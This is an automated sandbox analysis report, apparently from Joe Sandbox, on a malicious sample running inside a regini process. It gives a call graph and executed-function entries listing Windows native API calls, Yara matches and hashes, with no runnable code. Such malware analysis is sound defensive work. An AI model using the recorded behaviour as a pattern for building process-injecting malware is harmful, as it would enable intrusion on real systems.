calls 100637->100638 100640 47f83a 100638->100640 100639 47f843 100639->100615 100640->100639 100641 4746e0 2 API calls 100640->100641 100642 47f90e 100641->100642 100643 4746e0 2 API calls 100642->100643 100644 47f968 100642->100644 100643->100644 100644->100615 100647 47f755 100645->100647 100646 47f7eb CoUninitialize 100646->100624 100647->100646 100649 48918d 100648->100649 100657 2db2ba0 LdrInitializeThunk 100649->100657 100650 4891bd 100650->100630 100653 48902d 100652->100653 100656 2db2c60 LdrInitializeThunk 100653->100656 100654 476609 100654->100610 100656->100654 100657->100650 100658 488ca0 100659 488cbd 100658->100659 100662 2db2df0 LdrInitializeThunk 100659->100662 100660 488ce5 100662->100660 100663 489620 100664 48969a 100663->100664 100666 48964e 100663->100666 100665 4896b0 NtDeleteFile 100664->100665 100667 489520 100668 4895ca 100667->100668 100670 48954e 100667->100670 100669 4895e0 NtReadFile 100668->100669 100671 486260 100672 4862ba 100671->100672 100674 4862c7 100672->100674 100675 483c70 100672->100675 100676 48b750 NtAllocateVirtualMemory 100675->100676 100677 483cb1 100676->100677 100678 4746e0 2 API calls 100677->100678 100681 483dbe 100677->100681 100679 483cf7 100678->100679 100680 483d40 Sleep 100679->100680 100679->100681 100680->100679 100681->100674 100682 48c8e0 100683 48b7e0 RtlFreeHeap 100682->100683 100684 48c8f5 100683->100684 100685 481960 100686 48197c 100685->100686 100687 4819b8 100686->100687 100688 4819a4 100686->100688 100690 4896d0 NtClose 100687->100690 100689 4896d0 NtClose 100688->100689 100691 4819ad 100689->100691 100692 4819c1 100690->100692 100695 48b900 RtlAllocateHeap 100692->100695 100694 4819cc 100695->100694 100696 480320 100697 48033d 100696->100697 100698 4746e0 2 API calls 100697->100698 100699 48035b 100698->100699 100700 488b20 100701 488baf 100700->100701 100703 488b4b 100700->100703 100705 2db2ee0 LdrInitializeThunk 100701->100705 100702 488be0 100705->100702 100707 469eb0 100708 469ebf 100707->100708 100709 469f00 100708->100709 100710 469eed CreateThread 100708->100710 100711 472430 100712 472436 100711->100712 100713 488cf0 LdrInitializeThunk 100712->100713 100714 472466 100713->100714 100717 489770 100714->100717 100716 47247b 100718 489802 100717->100718 100720 48979e 100717->100720 100722 2db2e80 LdrInitializeThunk 100718->100722 100719 489833 100719->100716 100720->100716 100722->100719 100723 4774b0 100724 477522 100723->100724 100725 4774c8 100723->100725 100725->100724 100727 47b440 100725->100727 100728 47b466 100727->100728 100729 47b69c 100728->100729 100754 489af0 100728->100754 100729->100724 100731 47b4e2 100731->100729 100732 48c9b0 2 API calls 100731->100732 100733 47b4fe 100732->100733 100733->100729 100734 47b5d5 100733->100734 100736 488cf0 LdrInitializeThunk 100733->100736 100735 47b5f4 100734->100735 100738 475cd0 LdrInitializeThunk 100734->100738 100742 47b684 100735->100742 100761 488860 100735->100761 100737 47b560 100736->100737 100737->100734 100739 47b569 100737->100739 100738->100735 100739->100729 100740 47b5bd 100739->100740 100741 47b59b 100739->100741 100757 475cd0 100739->100757 100743 4782b0 LdrInitializeThunk 100740->100743 100776 484970 LdrInitializeThunk 100741->100776 100748 4782b0 LdrInitializeThunk 100742->100748 100747 47b5cb 100743->100747 100747->100724 100750 47b692 100748->100750 100749 47b65b 100766 488910 100749->100766 100750->100724 100752 47b675 100771 488a70 100752->100771 100755 489b0a 100754->100755 100756 489b1b CreateProcessInternalW 100755->100756 100756->100731 100758 475cdf 100757->100758 100777 488ec0 100758->100777 100760 475d0e 100760->100741 100762 4888e0 100761->100762 100764 48888e 100761->100764 100783 2db39b0 LdrInitializeThunk 100762->100783 100763 488905 100763->100749 100764->100749 100767 48898d 100766->100767 100769 48893b 100766->100769 100784 2db4340 LdrInitializeThunk 100767->100784 100768 4889b2 100768->100752 100769->100752 100772 488af0 100771->100772 100773 488a9e 100771->100773 100785 2db2fb0 LdrInitializeThunk 100772->100785 100773->100742 100774 488b15 100774->100742 100776->100740 100778 488f74 100777->100778 100779 488ef2 100777->100779 100782 2db2d10 LdrInitializeThunk 100778->100782 100779->100760 100780 488fb9 100780->100760 100782->100780 100783->100763 100784->100768 100785->100774 100786 470f30 100787 470f4a 100786->100787 100788 470f68 100787->100788 100789 4746e0 2 API calls 100787->100789 100790 470f9c PostThreadMessageW 100788->100790 100791 470fad 100788->100791 100789->100788 100790->100791 100792 476f30 100793 476f5a 100792->100793 100796 4780e0 100793->100796 100795 476f84 100797 4780fd 100796->100797 100803 488de0 100797->100803 100799 47814d 100800 478154 100799->100800 100801 488ec0 LdrInitializeThunk 100799->100801 100800->100795 100802 47817d 100801->100802 100802->100795 100804 488e7e 100803->100804 100805 488e0e 100803->100805 100808 2db2f30 LdrInitializeThunk 100804->100808 100805->100799 100806 488eb7 100806->100799 100808->100806 100809 47c7b0 100810 47c7d9 100809->100810 100811 47c8dd 100810->100811 100812 47c883 FindFirstFileW 100810->100812 100812->100811 100814 47c89e 100812->100814 100813 47c8c4 FindNextFileW 100813->100814 100815 47c8d6 FindClose 100813->100815 100814->100813 100815->100811 100816 481cf0 100820 481d09 100816->100820 100817 481d54 100818 48b7e0 RtlFreeHeap 100817->100818 100819 481d64 100818->100819 100820->100817 100821 481d94 100820->100821 100823 481d99 100820->100823 100822 48b7e0 RtlFreeHeap 100821->100822 100822->100823 100824 4893b0 100825 48946a 100824->100825 100827 4893e2 100824->100827 100826 489480 NtCreateFile 100825->100826

                                                                                  Executed Functions

                                                                                  Function 00469F10 Relevance: 27.9, Strings: 22, Instructions: 363COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 29 469f10-46a1c0 30 46a1ca-46a1da 29->30 30->30 31 46a1dc-46a1f4 30->31 32 46a205-46a20f 31->32 33 46a263-46a26d 32->33 34 46a211-46a261 32->34 36 46a27e-46a28a 33->36 34->32 37 46a28c-46a29b 36->37 38 46a29d-46a2b6 36->38 37->36 38->38 40 46a2b8-46a2d1 38->40 40->40 41 46a2d3-46a2da 40->41 42 46a2ff-46a310 41->42 43 46a2dc-46a2f2 41->43 46 46a321-46a32d 42->46 44 46a2f4-46a2fa 43->44 45 46a2fd 43->45 44->45 45->41 47 46a340-46a347 46->47 48 46a32f-46a33e 46->48 50 46a379-46a382 47->50 51 46a349-46a377 47->51 48->46 52 46a51a-46a524 50->52 53 46a388-46a39b 50->53 51->47 55 46a535-46a53e 52->55 54 46a3ac-46a3b8 53->54 58 46a3cf-46a3de 54->58 59 46a3ba-46a3cd 54->59 56 46a540-46a54c 55->56 57 46a54e-46a558 55->57 56->55 60 46a569-46a572 57->60 62 46a3e0-46a3ec 58->62 63 46a44a-46a454 58->63 59->54 65 46a574-46a583 60->65 66 46a585-46a58c 60->66 67 46a3ee-46a409 62->67 68 46a40b-46a412 62->68 69 46a465-46a471 63->69 65->60 72 46a58e-46a595 66->72 73 46a5bf-46a5c9 66->73 67->62 75 46a414-46a443 68->75 76 46a445 68->76 70 46a493-46a49d 69->70 71 46a473-46a480 69->71 79 46a4ae-46a4b7 70->79 77 46a482-46a48b 71->77 78 46a491 71->78 80 46a597-46a5ad 72->80 81 46a5ba call 48b440 72->81 82 46a5da-46a5e6 73->82 75->68 76->52 77->78 78->69 86 46a4ce-46a4d4 79->86 87 46a4b9-46a4cc 79->87 88 46a5af-46a5b5 80->88 89 46a5b8 80->89 81->73 83 46a604-46a60e 82->83 84 46a5e8-46a5f4 82->84 93 46a610-46a62f 83->93 94 46a65a-46a663 83->94 91 46a5f6-46a5fc 84->91 92 46a602 84->92 95 46a4d8-46a4e2 86->95 87->79 88->89 89->72 91->92 92->82 98 46a641-46a652 93->98 99 46a631-46a63f 93->99 100 46a4e4-46a503 95->100 101 46a515 95->101 102 46a658 98->102 99->102 103 46a505-46a50d 100->103 104 46a513 100->104 101->50 102->83 103->104 104->95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 1$1e$5$C$F$G$Gx$I^$Jv$V$Xg$]@$aY$c$e$l$oL$x2$z$D$X$}
                                                                                  • API String ID: 0-2409101627
                                                                                  • Opcode ID: c0656aee677b605768e3ee373dec1fbdb5942289cbaf3315b53c61ec052627b3
                                                                                  • Instruction ID: 5b651a7c1ca35d016126e6b6220e414bc39d78d2047050567ac0b39a0f0aa29b
                                                                                  • Opcode Fuzzy Hash: c0656aee677b605768e3ee373dec1fbdb5942289cbaf3315b53c61ec052627b3
                                                                                  • Instruction Fuzzy Hash: 9A129FB0D05628CBDB64CF85C8947DDBBB2BB44308F2081DAC5097B280DBB95AD9DF56
                                                                                  Function 0047C7B0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0047C894
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0047C8CF
                                                                                  • FindClose.KERNELBASE(?), ref: 0047C8DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 7e99e61d1f43b271cb12bed77c676ce7e10fe6c5edc95e166f12a7545896e1cf
                                                                                  • Instruction ID: cc62af67f872c22e8f19fe97b6245de9b4cc5459e1d8c1b132636d19f5f3e124
                                                                                  • Opcode Fuzzy Hash: 7e99e61d1f43b271cb12bed77c676ce7e10fe6c5edc95e166f12a7545896e1cf
                                                                                  • Instruction Fuzzy Hash: 9A319371900308BBDB20EBA5CC85FFF737CEF44745F14445EF909A6191DA74AA848BA5
                                                                                  Function 004893B0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004894B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: bdc28f7b65c3cdd930017ff862381c90ad356ace6833aa718188b513bd1064a1
                                                                                  • Instruction ID: 9d54e360bd143420f9a5972cd3afa1a2da635aaf6c858e0c0a70f67ade21239b
                                                                                  • Opcode Fuzzy Hash: bdc28f7b65c3cdd930017ff862381c90ad356ace6833aa718188b513bd1064a1
                                                                                  • Instruction Fuzzy Hash: C831E6B5A01608AFDB14DF99D881EEF77F9EF8C314F10860AF918A3340D774A9518BA5
                                                                                  Function 00489520 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00489609
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 987c9c5ed1eb8297e6075a1751b66d2c9c025a5bb1f56b5948a8c1b28ec5e0cb
                                                                                  • Instruction ID: 06202b866501b38add95b712ac875abfeece193fcf31c87838dc95bf15b5e1a7
                                                                                  • Opcode Fuzzy Hash: 987c9c5ed1eb8297e6075a1751b66d2c9c025a5bb1f56b5948a8c1b28ec5e0cb
                                                                                  • Instruction Fuzzy Hash: FD310AB5A00208AFDB14DF99D881EEF77F9EF8C314F10865AF918A7340D774A9118BA5
                                                                                  Function 00489840 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00471F1E,?,0048819F,00000000,00000004,00003000,?,?,?,?,?,0048819F,00471F1E,00000000,?,0048819F), ref: 0048990B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: 20ee0b1367dbea7ab7f64ace039bf5eb32452cb9eb1f7f23a46f57acb9cb4484
                                                                                  • Instruction ID: 78fad31519c4a33891a8181ae0d266f81d50d3ad4e844f9571ca5d975e388c52
                                                                                  • Opcode Fuzzy Hash: 20ee0b1367dbea7ab7f64ace039bf5eb32452cb9eb1f7f23a46f57acb9cb4484
                                                                                  • Instruction Fuzzy Hash: E6214DB5A00209AFDB14EF58DC81EEF77B9EF88304F10460EFD18A7241D774A9118BA5
                                                                                  Function 00489620 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: abf5a842f463631de45dd5feb0bf890711c78a46f63e77bb229b6bfd9453d75b
                                                                                  • Instruction ID: b33544592c591c192a47193dbc17201c7c58a812698745e62420f4c42ab99115
                                                                                  • Opcode Fuzzy Hash: abf5a842f463631de45dd5feb0bf890711c78a46f63e77bb229b6bfd9453d75b
                                                                                  • Instruction Fuzzy Hash: F21191B5600604BAD620EB65CC42FEF77ACDB85314F10494EF948A7281DB746A1287AA
                                                                                  Function 004896D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00489704
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                                  • Instruction ID: cbc986c8868fae33711142376e356fb695d76a67fd961785825c7402ef72964e
                                                                                  • Opcode Fuzzy Hash: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                                  • Instruction Fuzzy Hash: 97E04F752006047BD610EA5ADC02F9F779CDBC5714F00445AFA08A7241C675791187B9
                                                                                  Function 02DB4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5f5aa04744379f142db894f551822a9cb8fd9fbc1bc5ab5495bb05004a1c0956
                                                                                  • Instruction ID: 96d9077ae7a2d1d6f67480feea7fa9095a18b9b7a5629bfa3fa109c247bfbae8
                                                                                  • Opcode Fuzzy Hash: 5f5aa04744379f142db894f551822a9cb8fd9fbc1bc5ab5495bb05004a1c0956
                                                                                  • Instruction Fuzzy Hash: 6E90023160980112964171594884947400597E0301B65C015E042C774C8A158E566361
                                                                                  Function 02DB4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d856f1cce2a71aee9c6fba89e9d0a2b6d05f0b7564ca99ff43257241f1d47f6c
                                                                                  • Instruction ID: 3511ab922a214f5ea0a4015a32b81e73fbe9aa8c11c27d987cb353b7b4536871
                                                                                  • Opcode Fuzzy Hash: d856f1cce2a71aee9c6fba89e9d0a2b6d05f0b7564ca99ff43257241f1d47f6c
                                                                                  • Instruction Fuzzy Hash: 3790026160550142464171594804807600597E13013A5C119A055C770C86198D55A269
                                                                                  Function 02DB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9bb3ea07901532daabf2312b487461d8c644393d60732fb3eee3355dd879d371
                                                                                  • Instruction ID: b6aed1428449a8fc81d95ac93fc062d5ef0525cae670bdcd5a8a793f48ea36e5
                                                                                  • Opcode Fuzzy Hash: 9bb3ea07901532daabf2312b487461d8c644393d60732fb3eee3355dd879d371
                                                                                  • Instruction Fuzzy Hash: 0F900225215401030606B5590704907004687D5351365C025F101D770CD6228D616121
                                                                                  Function 02DB2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 813284777641231c2f88a757cfe44b6611fd6470fc8b25954809f12156d56836
                                                                                  • Instruction ID: a3984a3fc6e37d6297fc0bbdf524f35a00143b5235801b606990b186e71f0458
                                                                                  • Opcode Fuzzy Hash: 813284777641231c2f88a757cfe44b6611fd6470fc8b25954809f12156d56836
                                                                                  • Instruction Fuzzy Hash: E2900225225401020646B559060490B044597D63513A5C019F141E7B0CC6228D656321
                                                                                  Function 02DB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8983541e8c987c2c477b679223089887c6b6d1e9ded96536b589a84b2d60a666
                                                                                  • Instruction ID: 973e558f882d90e21b1f7d7a7039d40d49f8d991a784c601a0bbb1975e53c22b
                                                                                  • Opcode Fuzzy Hash: 8983541e8c987c2c477b679223089887c6b6d1e9ded96536b589a84b2d60a666
                                                                                  • Instruction Fuzzy Hash: 0390023120540902D68171594404A4B000587D1301FA5C019A002D774DCA168F5977A1
                                                                                  Function 02DB2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9269b89a3486a1f753a7331a2d509cdbb5d3f639ed31b00cccee6a7b54dafe9a
                                                                                  • Instruction ID: e97a07f4811fb844978002b55e7b1030480da5b85747132b6d3d7fa8761ca251
                                                                                  • Opcode Fuzzy Hash: 9269b89a3486a1f753a7331a2d509cdbb5d3f639ed31b00cccee6a7b54dafe9a
                                                                                  • Instruction Fuzzy Hash: 4890023120944942D64171594404E47001587D0305F65C015A006C7B4D96268E55B661
                                                                                  Function 02DB2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b0c8ab76098faa598fb8ec9ad205428c697b34cd4eadb6e566e03aa872b3690d
                                                                                  • Instruction ID: 6779294883cdfcaab824c5a7a8fae5abeae582caf648bb9092639f51e6cbc76a
                                                                                  • Opcode Fuzzy Hash: b0c8ab76098faa598fb8ec9ad205428c697b34cd4eadb6e566e03aa872b3690d
                                                                                  • Instruction Fuzzy Hash: 3490023160940902D65171594414B47000587D0301F65C015A002C774D87568F5576A1
                                                                                  Function 02DB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 76c27757fd8b8a0cb76a1094f601fcd11a68fbc59fc1004a22a7996876fa3b66
                                                                                  • Instruction ID: d0cf7a0c7815b4fc00dbdef551f5958f73ac679735f327c105ba78e4b269fb4d
                                                                                  • Opcode Fuzzy Hash: 76c27757fd8b8a0cb76a1094f601fcd11a68fbc59fc1004a22a7996876fa3b66
                                                                                  • Instruction Fuzzy Hash: C890026120640103460671594414A17400A87E0201B65C025E101C7B0DC5268D917125
                                                                                  Function 02DB2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2e1166f6553428baa85a30f2195cde13bd6230fdba89d0d069fde0ad46c11473
                                                                                  • Instruction ID: e57d9a67080c0afea3ac4c9852f54469e77ccc0073fe0d55c90b02e4a3f6f7c7
                                                                                  • Opcode Fuzzy Hash: 2e1166f6553428baa85a30f2195cde13bd6230fdba89d0d069fde0ad46c11473
                                                                                  • Instruction Fuzzy Hash: 1E90026120580503D64175594804A07000587D0302F65C015A206C775E8A2A8D517135
                                                                                  Function 02DB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 824ade85ebdd7ee6aa9b9ec6cd3e35bc1a6db8b7dd39c97caf12d3089d751bdb
                                                                                  • Instruction ID: 52cc7c3548773bc91a018235697f6a665cfe63e9ec88237bab1dad6db672214d
                                                                                  • Opcode Fuzzy Hash: 824ade85ebdd7ee6aa9b9ec6cd3e35bc1a6db8b7dd39c97caf12d3089d751bdb
